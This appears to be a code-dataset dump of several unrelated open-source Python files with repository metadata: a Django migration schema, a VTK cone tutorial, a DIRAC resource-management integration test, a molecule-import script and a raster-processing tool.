'neuroelectro.articlefulltext': {
'Meta': {'object_name': 'ArticleFullText'},
'article': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.Article']"}),
'full_text': ('picklefield.fields.PickledObjectField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'neuroelectro.brainregion': {
'Meta': {'object_name': 'BrainRegion'},
'abbrev': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'allenid': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True'}),
'color': ('django.db.models.fields.CharField', [], {'max_length': '10', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'isallen': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'treedepth': ('django.db.models.fields.IntegerField', [], {'null': 'True'})
},
'neuroelectro.datatable': {
'Meta': {'object_name': 'DataTable'},
'article': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.Article']"}),
'ephys_props': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['neuroelectro.EphysProp']", 'null': 'True', 'symmetrical': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'link': ('django.db.models.fields.CharField', [], {'max_length': '1000'}),
'neurons': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['neuroelectro.Neuron']", 'null': 'True', 'symmetrical': 'False'}),
'table_html': ('picklefield.fields.PickledObjectField', [], {'null': 'True'}),
'table_text': ('django.db.models.fields.CharField', [], {'max_length': '10000', 'null': 'True'})
},
'neuroelectro.datatabletag': {
'Meta': {'object_name': 'DataTableTag'},
'ephys_prop': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.EphysProp']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'neuron': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.Neuron']"})
},
'neuroelectro.ephysprop': {
'Meta': {'object_name': 'EphysProp'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'unit': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True'})
},
'neuroelectro.ephyspropsyn': {
'Meta': {'object_name': 'EphysPropSyn'},
'ephys_prop': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.EphysProp']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'term': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'neuroelectro.insituexpt': {
'Meta': {'object_name': 'InSituExpt'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'imageseriesid': ('django.db.models.fields.IntegerField', [], {}),
'plane': ('django.db.models.fields.CharField', [], {'max_length': '20'}),
'regionexprs': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['neuroelectro.RegionExpr']", 'null': 'True', 'symmetrical': 'False'}),
'valid': ('django.db.models.fields.BooleanField', [], {'default': 'True'})
},
'neuroelectro.journal': {
'Meta': {'object_name': 'Journal'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '300'})
},
'neuroelectro.meshterm': {
'Meta': {'object_name': 'MeshTerm'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'term': ('django.db.models.fields.CharField', [], {'max_length': '300'})
},
'neuroelectro.neuron': {
'Meta': {'object_name': 'Neuron'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'nlex_id': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}),
'regions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['neuroelectro.BrainRegion']", 'null': 'True', 'symmetrical': 'False'}),
'synonyms': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['neuroelectro.NeuronSyn']", 'null': 'True', 'symmetrical': 'False'})
},
'neuroelectro.neuronephyslink': {
'Meta': {'object_name': 'NeuronEphysLink'},
'data_table': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.DataTable']"}),
'ephys_prop': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.EphysProp']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'neuron': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.Neuron']"}),
'num_reps': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'val': ('django.db.models.fields.FloatField', [], {}),
'val_err': ('django.db.models.fields.FloatField', [], {'null': 'True'})
},
'neuroelectro.neuronsyn': {
'Meta': {'object_name': 'NeuronSyn'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'term': ('django.db.models.fields.CharField', [], {'max_length': '500'})
},
'neuroelectro.protein': {
'Meta': {'object_name': 'Protein'},
'allenid': ('django.db.models.fields.IntegerField', [], {}),
'common_name': ('django.db.models.fields.CharField', [], {'max_length': '400', 'null': 'True'}),
'entrezid': ('django.db.models.fields.IntegerField', [], {}),
'gene': ('django.db.models.fields.CharField', [], {'max_length': '20'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'in_situ_expts': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['neuroelectro.InSituExpt']", 'null': 'True', 'symmetrical': 'False'}),
'is_channel': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '400'}),
'synonyms': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['neuroelectro.ProteinSyn']", 'null': 'True', 'symmetrical': 'False'})
},
'neuroelectro.proteinsyn': {
'Meta': {'object_name': 'ProteinSyn'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'term': ('django.db.models.fields.CharField', [], {'max_length': '500'})
},
'neuroelectro.regionexpr': {
'Meta': {'object_name': 'RegionExpr'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'region': ('django.db.models.fields.related.ForeignKey', [], {'default': '0', 'to': "orm['neuroelectro.BrainRegion']"}),
'val': ('django.db.models.fields.FloatField', [], {})
},
'neuroelectro.species': {
'Meta': {'object_name': 'Species'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'specie': ('django.db.models.fields.CharField', [], {'max_length': '500'})
},
'neuroelectro.substance': {
'Meta': {'object_name': 'Substance'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'term': ('django.db.models.fields.CharField', [], {'max_length': '300'})
},
'neuroelectro.superprotein': {
'Meta': {'object_name': 'SuperProtein'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_channel': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '400'}),
'synonyms': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['neuroelectro.ProteinSyn']", 'null': 'True', 'symmetrical': 'False'})
}
}
complete_apps = ['neuroelectro']
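# With South, this migration is applied (or reverted) via the standard
# commands, e.g.:
#   ./manage.py migrate neuroelectro 0016
#   ./manage.py migrate neuroelectro 0015   # roll back the num_reps column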
|
lessc0de/neuroelectro_org
|
neuroelectro/south_migrations/0016_auto__add_field_neuronephyslink_num_reps.py
|
Python
|
gpl-2.0
| 10,641
|
[
"NEURON"
] |
15c7b912899d08b86faeec7d5c3e0a774e9549e8adc88fb00d5b17c13251b45c
|
#!/usr/bin/env python
#
# This example creates a polygonal model of a cone, and then renders it to
# the screen. It will rotate the cone 360 degrees and then exit. The basic
# setup of source -> mapper -> actor -> renderer -> renderwindow is
# typical of most VTK programs.
#
#
# First we include the VTK Python packages that will make available
# all of the VTK commands to Python.
#
import vtk
import time
#
# Next we create an instance of vtkConeSource and set some of its
# properties. The instance of vtkConeSource "cone" is part of a visualization
# pipeline (it is a source process object); it produces data (output type is
# vtkPolyData) which other filters may process.
#
cone = vtk.vtkConeSource()
cone.SetHeight( 3.0 )
cone.SetRadius( 1.0 )
cone.SetResolution( 10 )
#
# In this example we terminate the pipeline with a mapper process object.
# (Intermediate filters such as vtkShrinkPolyData could be inserted in
# between the source and the mapper.) We create an instance of
# vtkPolyDataMapper to map the polygonal data into graphics primitives. We
# connect the output of the cone source to the input of this mapper.
#
coneMapper = vtk.vtkPolyDataMapper()
coneMapper.SetInputConnection( cone.GetOutputPort() )
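#
# As noted above, an intermediate filter could be spliced in between the
# source and the mapper; a minimal sketch using vtkShrinkPolyData:
#
#   shrink = vtk.vtkShrinkPolyData()
#   shrink.SetInputConnection( cone.GetOutputPort() )
#   shrink.SetShrinkFactor( 0.9 )
#   coneMapper.SetInputConnection( shrink.GetOutputPort() )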
#
# Create an actor to represent the cone. The actor orchestrates rendering of
# the mapper's graphics primitives. An actor also refers to properties via a
# vtkProperty instance, and includes an internal transformation matrix. We
# set this actor's mapper to be coneMapper which we created above.
#
coneActor = vtk.vtkActor()
coneActor.SetMapper( coneMapper )
#
# Create the Renderer and assign actors to it. A renderer is like a
# viewport. It is part or all of a window on the screen and it is
# responsible for drawing the actors it has. We also set the background
# color here
#
ren1= vtk.vtkRenderer()
ren1.AddActor( coneActor )
ren1.SetBackground( 0.1, 0.2, 0.4 )
#
# Finally we create the render window which will show up on the screen
# We put our renderer into the render window using AddRenderer. We also
# set the size to be 300 pixels by 300
#
renWin = vtk.vtkRenderWindow()
renWin.AddRenderer( ren1 )
renWin.SetSize( 300, 300 )
#
# now we loop over 360 degrees and render the cone each time
#
for i in range(0,360):
time.sleep(0.03)
renWin.Render()
ren1.GetActiveCamera().Azimuth( 1 )
|
hlzz/dotfiles
|
graphics/VTK-7.0.0/Examples/Tutorial/Step1/Python/Cone.py
|
Python
|
bsd-3-clause
| 2,419
|
[
"VTK"
] |
9cea435c570b40824ece37eaced3b7b806778c0cd31a50f4e39d10b64ce7a1a4
|
''' This is a test of the chain
ResourceManagementClient -> ResourceManagementHandler -> ResourceManagementDB
It supposes that the DB is present, and that the service is running
The DB is supposed to be empty when the test starts
'''
# pylint: disable=invalid-name,wrong-import-position
import sys
import datetime
import unittest
from DIRAC.Core.Base.Script import parseCommandLine
parseCommandLine()
from DIRAC import gLogger
from DIRAC.ResourceStatusSystem.Client.ResourceManagementClient import ResourceManagementClient
gLogger.setLevel('DEBUG')
dateEffective = datetime.datetime.now()
lastCheckTime = datetime.datetime.now()
class TestClientResourceManagementTestCase(unittest.TestCase):
def setUp(self):
self.rmClient = ResourceManagementClient()
def tearDown(self):
pass
class ResourceManagementClientChain(TestClientResourceManagementTestCase):
def test_AccountingCache(self):
"""
DowntimeCache table
"""
res = self.rmClient.deleteAccountingCache('TestName12345') # just making sure it's not there (yet)
self.assertTrue(res['OK'])
# TEST addOrModifyAccountingCache
res = self.rmClient.addOrModifyAccountingCache('TestName12345', 'plotType', 'plotName', 'result',
datetime.datetime.now(), datetime.datetime.now())
self.assertTrue(res['OK'])
res = self.rmClient.selectAccountingCache('TestName12345')
self.assertTrue(res['OK'])
# check if the name that we got is equal to the previously added 'TestName12345'
self.assertEqual(res['Value'][0][0], 'TestName12345')
res = self.rmClient.addOrModifyAccountingCache('TestName12345', 'plotType', 'plotName', 'changedresult',
dateEffective, lastCheckTime)
self.assertTrue(res['OK'])
res = self.rmClient.selectAccountingCache('TestName12345')
# check if the result has changed
self.assertEqual(res['Value'][0][4], 'changedresult')
# TEST deleteAccountingCache
# ...............................................................................
res = self.rmClient.deleteAccountingCache('TestName12345')
self.assertTrue(res['OK'])
res = self.rmClient.selectAccountingCache('TestName12345')
self.assertTrue(res['OK'])
self.assertFalse(res['Value'])
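# Every cache test below follows the same round-trip pattern (sketched here
# with illustrative placeholders, not an additional API):
#   deleteXCache('TestName12345')           # ensure a clean slate
#   addOrModifyXCache(...)                  # insert, read back, assert the row
#   addOrModifyXCache(..., field=newValue)  # update, read back, assert the change
#   deleteXCache(...)                       # remove, read back, assert it is gone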
def test_DowntimeCache(self):
"""
DowntimeCache table
"""
res = self.rmClient.deleteDowntimeCache('TestName12345') # just making sure it's not there (yet)
self.assertTrue(res['OK'])
# TEST addOrModifyDowntimeCache
res = self.rmClient.addOrModifyDowntimeCache('TestName12345', 'element', 'name',
datetime.datetime.now(), datetime.datetime.now(),
'severity', 'description', 'link',
datetime.datetime.now(), datetime.datetime.now(),
'gOCDBServiceType')
self.assertTrue(res['OK'])
res = self.rmClient.selectDowntimeCache('TestName12345')
self.assertTrue(res['OK'])
# check if the name that we got is equal to the previously added 'TestName12345'
self.assertEqual(res['Value'][0][0], 'TestName12345')
res = self.rmClient.addOrModifyDowntimeCache('TestName12345', 'element', 'name', severity='changedSeverity')
self.assertTrue(res['OK'])
res = self.rmClient.selectDowntimeCache('TestName12345')
# check if the result has changed
self.assertEqual(res['Value'][0][4], 'changedSeverity')
# TEST deleteDowntimeCache
# ...............................................................................
res = self.rmClient.deleteDowntimeCache('TestName12345')
self.assertTrue(res['OK'])
res = self.rmClient.selectDowntimeCache('TestName12345')
self.assertTrue(res['OK'])
self.assertFalse(res['Value'])
def test_GGUSTicketsCache(self):
"""
GGUSTicketsCache table
"""
res = self.rmClient.deleteGGUSTicketsCache('TestName12345') # just making sure it's not there (yet)
self.assertTrue(res['OK'])
# TEST addOrModifyGGUSTicketsCache
res = self.rmClient.addOrModifyGGUSTicketsCache('TestName12345', 'link', 0, 'tickets', datetime.datetime.now())
self.assertTrue(res['OK'])
res = self.rmClient.selectGGUSTicketsCache('TestName12345')
self.assertTrue(res['OK'])
# check if the name that we got is equal to the previously added 'TestName12345'
self.assertEqual(res['Value'][0][0], 'TestName12345')
res = self.rmClient.addOrModifyGGUSTicketsCache('TestName12345', 'newLink')
self.assertTrue(res['OK'])
res = self.rmClient.selectGGUSTicketsCache('TestName12345')
# check if the result has changed
self.assertEqual(res['Value'][0][3], 'newLink')
# TEST deleteGGUSTicketsCache
# ...............................................................................
res = self.rmClient.deleteGGUSTicketsCache('TestName12345')
self.assertTrue(res['OK'])
res = self.rmClient.selectGGUSTicketsCache('TestName12345')
self.assertTrue(res['OK'])
self.assertFalse(res['Value'])
def test_JobCache(self):
"""
JobCache table
"""
res = self.rmClient.deleteJobCache('TestName12345') # just making sure it's not there (yet)
self.assertTrue(res['OK'])
# TEST addOrModifyJobCache
res = self.rmClient.addOrModifyJobCache('TestName12345', 'maskstatus', 50.89, 'status', datetime.datetime.now())
self.assertTrue(res['OK'])
res = self.rmClient.selectJobCache('TestName12345')
self.assertTrue(res['OK'])
# check if the name that we got is equal to the previously added 'TestName12345'
self.assertEqual(res['Value'][0][0], 'TestName12345')
res = self.rmClient.addOrModifyJobCache('TestName12345', status='newStatus')
self.assertTrue(res['OK'])
res = self.rmClient.selectJobCache('TestName12345')
# check if the result has changed
self.assertEqual(res['Value'][0][1], 'newStatus')
# TEST deleteJobCache
# ...............................................................................
res = self.rmClient.deleteJobCache('TestName12345')
self.assertTrue(res['OK'])
res = self.rmClient.selectJobCache('TestName12345')
self.assertTrue(res['OK'])
self.assertFalse(res['Value'])
def test_PilotCache(self):
"""
PilotCache table
"""
res = self.rmClient.deletePilotCache('TestName12345') # just making sure it's not there (yet)
self.assertTrue(res['OK'])
# TEST addOrModifyPilotCache
res = self.rmClient.addOrModifyPilotCache('TestName12345', 'CE', 0.0, 25.5, 'status', datetime.datetime.now())
self.assertTrue(res['OK'])
res = self.rmClient.selectPilotCache('TestName12345')
self.assertTrue(res['OK'])
# check if the name that we got is equal to the previously added 'TestName12345'
self.assertEqual(res['Value'][0][0], 'TestName12345')
res = self.rmClient.addOrModifyPilotCache('TestName12345', status='newStatus')
self.assertTrue(res['OK'])
res = self.rmClient.selectPilotCache('TestName12345')
# check if the result has changed
self.assertEqual(res['Value'][0][2], 'newStatus')
# TEST deletePilotCache
# ...............................................................................
res = self.rmClient.deletePilotCache('TestName12345')
self.assertTrue(res['OK'])
res = self.rmClient.selectPilotCache('TestName12345')
self.assertTrue(res['OK'])
self.assertFalse(res['Value'])
def test_PolicyResult(self):
"""
PolicyResult table
"""
res = self.rmClient.deletePolicyResult('element', 'TestName12345',
'policyName', 'statusType') # just making sure it's not there (yet)
self.assertTrue(res['OK'])
# TEST addOrModifyPolicyResult
res = self.rmClient.addOrModifyPolicyResult('element', 'TestName12345', 'policyName',
'statusType', 'status', 'reason',
datetime.datetime.now(), datetime.datetime.now())
self.assertTrue(res['OK'])
res = self.rmClient.selectPolicyResult('element', 'TestName12345', 'policyName', 'statusType')
self.assertTrue(res['OK'])
# check if the statusType that we got is equal to the previously added 'statusType'
self.assertEqual(res['Value'][0][1], 'statusType')
res = self.rmClient.addOrModifyPolicyResult('element', 'TestName12345', 'policyName', 'statusType',
status='newStatus')
self.assertTrue(res['OK'])
res = self.rmClient.selectPolicyResult('element', 'TestName12345', 'policyName', 'statusType')
# check if the result has changed
self.assertEqual(res['Value'][0][4], 'newStatus')
# TEST deletePolicyResult
# ...............................................................................
res = self.rmClient.deletePolicyResult('element', 'TestName12345', 'policyName', 'statusType')
self.assertTrue(res['OK'])
res = self.rmClient.selectPolicyResult('element', 'TestName12345', 'policyName', 'statusType')
self.assertTrue(res['OK'])
self.assertFalse(res['Value'])
def test_SpaceTokenOccupancy(self):
"""
SpaceTokenOccupancy table
"""
res = self.rmClient.deleteSpaceTokenOccupancyCache('endpoint', 'token') # just making sure it's not there (yet)
self.assertTrue(res['OK'])
# TEST addOrModifySpaceTokenOccupancy
res = self.rmClient.addOrModifySpaceTokenOccupancyCache('endpoint', 'token', 500.0, 1000.0, 200.0,
datetime.datetime.now())
self.assertTrue(res['OK'])
res = self.rmClient.selectSpaceTokenOccupancyCache('endpoint', 'token')
self.assertTrue(res['OK'])
# check if the name that we got is equal to the previously added 'token'
self.assertEqual(res['Value'][0][1], 'token')
res = self.rmClient.addOrModifySpaceTokenOccupancyCache('endpoint', 'token', free=100.0)
self.assertTrue(res['OK'])
res = self.rmClient.selectSpaceTokenOccupancyCache('endpoint', 'token')
# check if the result has changed
self.assertEqual(res['Value'][0][3], 100.0)
# TEST deleteSpaceTokenOccupancy
# ...............................................................................
res = self.rmClient.deleteSpaceTokenOccupancyCache('endpoint', 'token')
self.assertTrue(res['OK'])
res = self.rmClient.selectSpaceTokenOccupancyCache('endpoint', 'token')
self.assertTrue(res['OK'])
self.assertFalse(res['Value'])
def test_Transfer(self):
"""
TransferCache table
"""
res = self.rmClient.deleteTransferCache('sourcename', 'destinationname') # just making sure it's not there (yet)
self.assertTrue(res['OK'])
# TEST addOrModifyTransferCache
res = self.rmClient.addOrModifyTransferCache('sourcename', 'destinationname', 'metric', 1000.0,
datetime.datetime.now())
self.assertTrue(res['OK'])
res = self.rmClient.selectTransferCache('sourcename', 'destinationname')
self.assertTrue(res['OK'])
# check if the metric that we got is equal to the previously added 'metric'
self.assertEqual(res['Value'][0][2], 'metric')
res = self.rmClient.addOrModifyTransferCache('sourcename', 'destinationname', value=200.0)
self.assertTrue(res['OK'])
res = self.rmClient.selectTransferCache('sourcename', 'destinationname')
# check if the result has changed
self.assertEqual(res['Value'][0][3], 200.0)
# TEST deleteTransferCache
# ...............................................................................
res = self.rmClient.deleteTransferCache('sourcename', 'destinationname')
self.assertTrue(res['OK'])
res = self.rmClient.selectTransferCache('sourcename', 'destinationname')
self.assertTrue(res['OK'])
self.assertFalse(res['Value'])
if __name__ == '__main__':
suite = unittest.defaultTestLoader.loadTestsFromTestCase(TestClientResourceManagementTestCase)
suite.addTest(unittest.defaultTestLoader.loadTestsFromTestCase(ResourceManagementClientChain))
testResult = unittest.TextTestRunner(verbosity=2).run(suite)
sys.exit(not testResult.wasSuccessful())
# EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF
|
andresailer/DIRAC
|
tests/Integration/ResourceStatusSystem/Test_ResourceManagement.py
|
Python
|
gpl-3.0
| 12,465
|
[
"DIRAC"
] |
7578ec163952fc6fbe856f5db101f42c33ca08af45baa89e8b4a210f4d5bee90
|
import pybel
import openbabel
import csv
from openmoldbmolecules.models import Molecule
"""
THIS IS OBSOLETE! USE add2db.py
"""
def add_mols(data):
namec = ""
altnamec = ""
suppc = ""
suppidc = ""
storc = ""
storidc = ""
amountc = ""
unitc = ""
casc = ""
altsupplierc = ""
altsupplierIDc = ""
commc = ""
classc = ""
counter = 0
head = data.next()
for c in head:
#Get the indexes of columns
cl = c.lower()
if cl == "name":
namec = counter
elif cl == "altname":
altnamec = counter
elif cl == "supplier":
suppc = counter
elif cl == "supplierid":
suppidc = counter
elif cl == "storage":
storc = counter
elif cl == "storageid":
storidc = counter
elif cl == "amount":
amountc = counter
elif cl == "unit":
unitc = counter
elif cl == "cas":
casc = counter
elif cl == "smiles":
smilesc = counter
elif cl == "supplier2":
altsupplierc = counter
elif cl == "supplierid2":
altsupplierIDc = counter
elif cl == "comment":
commc = counter
elif cl == "molclass":
classc = counter
counter += 1
if type(smilesc) == int or type(namec) == int:
# has to have either smiles or name column
print "Following columns were found and will be imported:"
if type(namec) == int:
print head[namec] + " ",
if type(altnamec) == int:
print head[altnamec] + " ",
if type(suppc) == int:
print head[suppc] + " ",
if type(suppidc) == int:
print head[suppidc] + " ",
if type(storc) == int:
print head[storc] + " ",
if type(storidc) == int:
print head[storidc] + " ",
if type(amountc) == int:
print head[amountc] + " ",
if type(unitc) == int:
print head[unitc] + " ",
if type(casc) == int:
print head[casc] + " ",
if type(smilesc) == int:
print head[smilesc] + " ",
if type(altsupplierc) == int:
print head[altsupplierc] + " ",
if type(altsupplierIDc) == int:
print head[altsupplierIDc] + " ",
if type(commc) == int:
print head[commc] + " ",
if type(classc) == int:
print head[classc] + " ",
print ""
userinput = raw_input("Is this ok? yes/no: ")
#Check with user if everything looks OK
if userinput == "yes":
for line in data:
#do some data checks and re-encode the Windows-1252 input as UTF-8, ignoring unmappable characters
if type(namec) == int:
name = line[namec].decode("windows-1252").encode('utf-8','ignore')
else:
name = ""
if type(altnamec) == int:
altname = line[altnamec].decode("windows-1252").encode('utf-8','ignore')
else:
altname = ""
if type(suppc) == int:
supp = line[suppc].decode("windows-1252").encode('utf-8','ignore')
else:
supp = ""
if type(suppidc) == int:
suppid = line[suppidc].decode("windows-1252").encode('utf-8','ignore')
else:
suppid = ""
if type(storc) == int:
storage = line[storc].decode("windows-1252").encode('utf-8','ignore')
else:
storage = ""
if type(storidc) == int:
storageid = line[storidc].decode("windows-1252").encode('utf-8','ignore')
else:
storageid = ""
if type(amountc) == int:
amount = line[amountc]
else:
amount = ""
if type(unitc) == int:
unit = line[unitc].decode("windows-1252").encode('utf-8','ignore')
else:
unit = ""
if type(casc) == int:
cas = line[casc].decode("windows-1252").encode('utf-8','ignore')
else:
cas = ""
if type(smilesc) == int:
smiles = line[smilesc].decode("windows-1252").encode('utf-8','ignore')
else:
smiles = ""
if type(altsupplierc) == int:
altsupplier = line[altsupplierc].decode("windows-1252").encode('utf-8','ignore')
else:
altsupplier = ""
if type(altsupplierIDc) == int:
altsupplierID = line[altsupplierIDc].decode("windows-1252").encode('utf-8','ignore')
else:
altsupplierID = ""
if type(commc) == int:
comm = line[commc].decode("windows-1252").encode('utf-8','ignore')
else:
comm = ""
if type(classc) == int:
molclass = line[classc].decode("windows-1252").encode('utf-8','ignore')
else:
molclass = ""
try:
amount = float(line[amountc])
unit = line[unitc]
except:
amount = 0
unit = "X"
try:
mol = pybel.readstring("smi",smiles)
descs = mol.calcdesc()
#generate 2D coordinates, needs openbabel
obConversion = openbabel.OBConversion()
obConversion.SetInAndOutFormats("smi", "mdl")
obmol = openbabel.OBMol()
obConversion.ReadString(obmol, smiles)
gen2d = openbabel.OBOp.FindType("gen2d")
gen2d.Do(obmol)
MDL = obConversion.WriteString(obmol)
outMDL = MDL.replace("\n", r"\n")
CMW=descs["MW"]
CHN=mol.formula
HBA=descs["HBA1"]
HBD=descs["HBD"]
logP=descs["logP"]
tpsa=descs["TPSA"]
#Get number of rotatable bonds
smarts = pybel.Smarts("[!$([NH]!@C(=O))&!D1&!$(*#*)]\&!@[!$([NH]!@C(=O))&!D1&!$(*#*)]")
rb = smarts.findall(mol)
nrb = len(rb)
#Calculate Fsp3
sp3c = pybel.Smarts("[CX4]")
nsp3c = sp3c.findall(mol)
nsp3c = float(len(nsp3c))
allc = pybel.Smarts("[#6]")
nallc = allc.findall(mol)
nallc = float(len(nallc))
if nallc > 0:
fsp3 = nsp3c/nallc
print fsp3
else:
fsp3 = ""
#Get fingerprint and molecular complexity
fprint = mol.calcfp()
bitson = fprint.bits
nbitson = len(bitson)
print name
m = Molecule(name=name,SMILES=smiles, altname=altname, supplier=supp, supplierID=suppid, CMW=descs["MW"], CHN=CHN, HBA=HBA, HBD=HBD, logP=logP, tpsa=tpsa, amount=amount, unit=unit, CAS=cas, storage=storage, storageID=storageid, molfile=outMDL, nrb=nrb, fingerprint=bitson, complexity=nbitson, altsupplier=altsupplier, altsupplierID=altsupplierID , comment=comm, molclass=molclass, fsp3=fsp3)
m.save()
except:
m = Molecule(name=name,SMILES=smiles, altname=altname, supplier=supp, supplierID=suppid, amount=amount, unit=unit, CAS=cas, storage=storage, storageID=storageid, altsupplier=altsupplier, altsupplierID=altsupplierID , comment=comm, molclass=molclass)
m.save()
#Save data to database
else:
print "Exiting, no changes were made..."
return False
else:
print "No valid columns were found in the table"
if __name__ == '__main__':
import sys
datacard = sys.argv[1]
data = csv.reader(open(datacard), dialect='excel')
add_mols(data)
|
samoturk/openmolDB
|
managemols.py
|
Python
|
bsd-3-clause
| 8,833
|
[
"Pybel"
] |
f99466187cce69628286e8c67225b4a1349ef8c7818c8cdd9188325470e5293d
|
#!/usr/bin/env python3
import sys
import argparse
import numpy as np
from mapTools import *
from utilities import filesFromList, writeLog
from plotTools import addImagePlot, addScatterPlot
import matplotlib.pyplot as plt
'''
Description:
Author: Mikko Auvinen
mikko.auvinen@fmi.fi
Finnish Meteorological Institute
'''
#==========================================================#
parser = argparse.ArgumentParser(prog='processDomain.py')
parser.add_argument("-f", "--filename",type=str, help="Name of the comp domain data file.")
parser.add_argument("-fo", "--fileout",type=str, help="Name of output Palm topography file.")
parser.add_argument("-i0","--iZero", help="Pixel ids [N,E] for the zero level.",\
type=int,nargs=2,default=[None,None])
parser.add_argument("-na", "--nansAbove", type=float, default=None,\
help="Replace values above given threshold by <nans> (i.e. fill values). Default=None")
parser.add_argument("-nb", "--nansBelow", type=float, default=None,\
help="Replace values below given threshold by <nans> (i.e. fill values). Default=None")
parser.add_argument("-mw","--mrgnW", help="Zero or non-zero margin widths as ratios (0-1): [L,R,B,T]",\
type=float,nargs=4,default=[None,None,None,None])
parser.add_argument("-mr","--mrgnR", help="Margin ramp widths as ratios (0-1): [L,R,B,T]",\
type=float,nargs=4,default=[None,None,None,None])
parser.add_argument("-mh","--mrgnH", help="Margins heights: [L,R,B,T]. Default=0",\
type=float,nargs=4,default=[0.,0.,0.,0.])
helpFlt = ''' Filter type and its associated number. Available filters:
median, percentile, rank, gaussian, local. Entering \"user, num\" allows the user
to specify <num> different filters consecutively.
Example entry: median 5'''
parser.add_argument("-ft","--filter",type=str,nargs=2,default=[None,None], help=helpFlt)
parser.add_argument("-rx","--rmax", type=float, default=None,\
help="Recover peaks (after filtering) above given value.")
parser.add_argument("-hx","--hmax", type=float, default=None,\
help="Maximum allowable height.")
parser.add_argument("-p", "--printOn", action="store_true", default=False,\
help="Print the resulting raster data.")
parser.add_argument("-pp", "--printOnly", help="Only print the resulting data. Don't save.",\
action="store_true", default=False)
args = parser.parse_args()
writeLog( parser, args, args.printOnly )
#==========================================================#
filename= args.filename
fileout = args.fileout
na = args.nansAbove
nb = args.nansBelow
i0 = args.iZero # Rename
mw = args.mrgnW
mr = args.mrgnR
mh = args.mrgnH
flt = args.filter
hmax = args.hmax
rmax = args.rmax
printOn = args.printOn
printOnly = args.printOnly
if( flt[0] is None ): fltStr = ' '
else: fltStr = flt[0]+'-filtered: '
# Read the raster tile to be processed.
Rdict = readNumpyZTile(filename)
R = Rdict['R']
Rdims = np.array(np.shape(R))
ROrig = Rdict['GlobOrig']
print(' Rdims = {} '.format(Rdims))
print(' ROrig = {} '.format(ROrig))
# Set the zero level according to the given pixel value.
if(i0.count(None) == 0):
print(' Zero Level: {} '.format(R[i0[0],i0[1]]))
R0 = R[i0[0],i0[1]]
R -= R0
R[R<0.] = 0.
R = applyMargins( R , mw, mr, mh )
# Apply desired filters.
Rf = np.zeros( np.shape(R) , float)
Rf = filterAndScale(Rf, R, flt )
# Apply nans where fill values are desired.
Rf = replaceByNans( Rf, na, nb)
if( rmax is not None ):
idv = (Rf > rmax)
Rf[idv] = np.maximum( Rf[idv], R[idv] )
if( hmax is not None ):
Rf = np.minimum( hmax , Rf )
Rdict['R'] = Rf; Rdict['GlobOrig'] = ROrig
if( not args.printOnly ):
saveTileAsNumpyZ( fileout, Rdict )
if( args.printOn or args.printOnly ):
figDims = 13.*(Rdims[::-1].astype(float)/np.max(Rdims))
#print('Sum = {}'.format(np.sum(Rf)))
fig = plt.figure(num=1, figsize=figDims)
fig = addImagePlot( fig, Rf, fltStr+fileout )
plt.show()
R = Rf = None
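# Example invocation (file names are illustrative):
#   ./processDomain.py -f topo.npz -fo topo_palm.npz -i0 0 0 -ft median 5 -hx 50.0 -p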
|
mjsauvinen/P4UL
|
pyRaster/processDomain.py
|
Python
|
mit
| 3,976
|
[
"Gaussian"
] |
5798d6aec854308400111111ed30683bab23bce4ef14e8c0e15fc6336bc2c424
|
